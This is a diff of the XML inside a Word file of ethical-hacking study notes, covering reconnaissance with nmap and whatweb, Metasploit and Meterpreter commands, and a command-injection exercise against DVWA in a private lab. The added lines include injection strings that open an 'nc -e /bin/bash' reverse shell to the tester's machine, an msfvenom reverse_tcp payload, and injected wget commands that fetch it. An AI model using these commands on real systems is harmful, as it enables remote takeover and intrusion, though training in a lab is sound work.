-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –list </w:t>
-            </w:r>
-            <w:r>
-              <w:t>payload</w:t>
+              <w:t xml:space="preserve"> msfvenom –list venom</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: msfvenom –list payload</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -5044,25 +3970,7 @@
                 <w:bCs/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t xml:space="preserve">Veil – generating </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>powershell</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> payload</w:t>
+              <w:t>Veil – generating powershell payload</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5153,15 +4061,7 @@
               <w:jc w:val="center"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Note: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>fatrat</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – check it out in google and follow instructions</w:t>
+              <w:t>Note: fatrat – check it out in google and follow instructions</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5201,11 +4101,9 @@
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>getuid</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -5274,36 +4172,21 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">CL </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>meterpreter</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>CL meterpreter</w:t>
+            </w:r>
             <w:r>
               <w:t xml:space="preserve"> &gt; </w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pwd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>dir</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>CL: pwd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: dir</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:r>
@@ -5339,28 +4222,12 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">Some of the command in, when </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>your</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> in windows 10 machine</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;download {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>fileName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+              <w:t>Some of the command in, when your in windows 10 machine</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;download {fileName}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5368,18 +4235,7 @@
               <w:t>&gt;</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve">upload </w:t>
-            </w:r>
-            <w:r>
-              <w:t>{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>fileName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+              <w:t>upload {fileName}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5422,32 +4278,12 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">&gt;search </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>bypassuac</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – user account control</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">search </w:t>
-            </w:r>
-            <w:r>
-              <w:t>2020</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> – </w:t>
-            </w:r>
-            <w:r>
-              <w:t>all modules that can out this year</w:t>
+              <w:t>&gt;search bypassuac – user account control</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;search 2020 – all modules that can out this year</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5542,36 +4378,71 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t>Website Application Penetration</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>&lt;dirb</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">     ----</w:t>
+            </w:r>
+            <w:r>
+              <w:sym w:font="Wingdings" w:char="F0E0"/>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> Find directory in the website</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">&lt;dirb </w:t>
+            </w:r>
+            <w:hyperlink w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>http://{ipaddress}</w:t>
+              </w:r>
+            </w:hyperlink>
+          </w:p>
           <w:p/>
         </w:tc>
         <w:tc>
@@ -9314,6 +8185,29 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:styleId="Hyperlink">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00002A1B"/>
+    <w:rPr>
+      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="UnresolvedMention">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00002A1B"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -4457,6 +4457,44 @@
           <w:tcPr>
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Command Injection</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;dvwa website 192.168.1.1;ls-la</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>Or</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;nc -lvp 12345</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>Type this in Kali(above) and use this(below)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>192.168.1.1; nc -e /bin/bash 192.168.1.85 12345</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>192.168.1.1</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> &amp; ls -la</w:t>
+            </w:r>
+          </w:p>
           <w:p/>
         </w:tc>
         <w:tc>

--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -233,6 +233,19 @@
             </w:r>
           </w:p>
           <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="3350"/>
+              </w:tabs>
+            </w:pPr>
+            <w:r>
+              <w:tab/>
+            </w:r>
+          </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
@@ -4501,6 +4514,125 @@
           <w:tcPr>
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Getting Meterpreter shell with command execution</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=6000 &gt;&gt; tester.py</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>&gt;s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>udo service apache2 start</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:color w:val="111111"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:color w:val="111111"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>sudo service apache2 restart</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:color w:val="111111"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:color w:val="111111"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve">sudo service apache2 </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:color w:val="111111"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>stop</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:t>192.168.1.1</w:t>
+            </w:r>
+            <w:r>
+              <w:t>;ls</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>OR</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;;ls</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>&gt;wget 192.168.1.85/tester.py</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;;wget 192.168.1.9/tester.py</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;;ls</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
           <w:p/>
         </w:tc>
       </w:tr>

--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -228,9 +228,19 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>sudo ifconfig</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ifconfig</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
           <w:p/>
@@ -264,8 +274,13 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>pwd – current directory</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>pwd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – current directory</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -300,12 +315,14 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>M</w:t>
             </w:r>
             <w:r>
               <w:t>kdir</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – add folder</w:t>
             </w:r>
@@ -403,8 +420,13 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>Virtual Machine msfadmin</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Virtual Machine </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfadmin</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -513,8 +535,21 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>sudo su – ROOT USER</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>su</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – ROOT USER</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -708,11 +743,19 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Nglookup erertech.com</w:t>
+              <w:t>Nglookup</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> erertech.com</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -723,6 +766,7 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -735,6 +779,7 @@
               </w:rPr>
               <w:t>hois</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -765,8 +810,13 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
-            <w:r>
-              <w:t>Whatweb erertech.com -v</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Whatweb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> erertech.com -v</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -801,6 +851,7 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -813,6 +864,7 @@
               </w:rPr>
               <w:t>hatweb</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -832,6 +884,7 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -842,12 +895,19 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve">hatweb </w:t>
-            </w:r>
+              <w:t>hatweb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
               <w:t>erertech.com</w:t>
             </w:r>
             <w:r>
@@ -863,16 +923,24 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>whatweb 192</w:t>
-            </w:r>
+              <w:t>whatweb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
+              <w:t xml:space="preserve"> 192</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
               <w:t>.168.1.4-192.168.1.255</w:t>
             </w:r>
             <w:r>
@@ -975,12 +1043,14 @@
               </w:rPr>
               <w:t>-</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
               <w:t>theHarvester</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -1010,12 +1080,26 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve">-theHarvester -d erertech.com </w:t>
-            </w:r>
+              <w:t>-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
+              <w:t>theHarvester</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -d erertech.com </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
               <w:t>-b all</w:t>
             </w:r>
           </w:p>
@@ -1108,13 +1192,23 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>Sudo apt update</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>Sudo apt install python-pip</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> apt update</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> apt install python-pip</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1373,13 +1467,31 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo netdiscover</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>netdiscover</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -1601,7 +1713,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Nmap -sS {IPADDRESS}</w:t>
+              <w:t>Nmap -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1632,8 +1760,29 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -sU {IPADDRESS}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sU</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1649,7 +1798,15 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Nmap -s</w:t>
+              <w:t>Nmap -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>s</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1658,6 +1815,7 @@
               </w:rPr>
               <w:t>T</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1698,8 +1856,16 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>man nmap</w:t>
-            </w:r>
+              <w:t xml:space="preserve">man </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – manual, really helps!</w:t>
             </w:r>
@@ -1750,14 +1916,35 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
             </w:r>
             <w:r>
               <w:t>O</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> {ipaddress}</w:t>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1784,8 +1971,37 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -sV {ipaddress}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -1796,24 +2012,115 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo nmap -A {ipaddress}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>Sudo nmap -sV –version-intensity 9 {ipaddress}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>nmap -sn {ipaddress}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -A {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
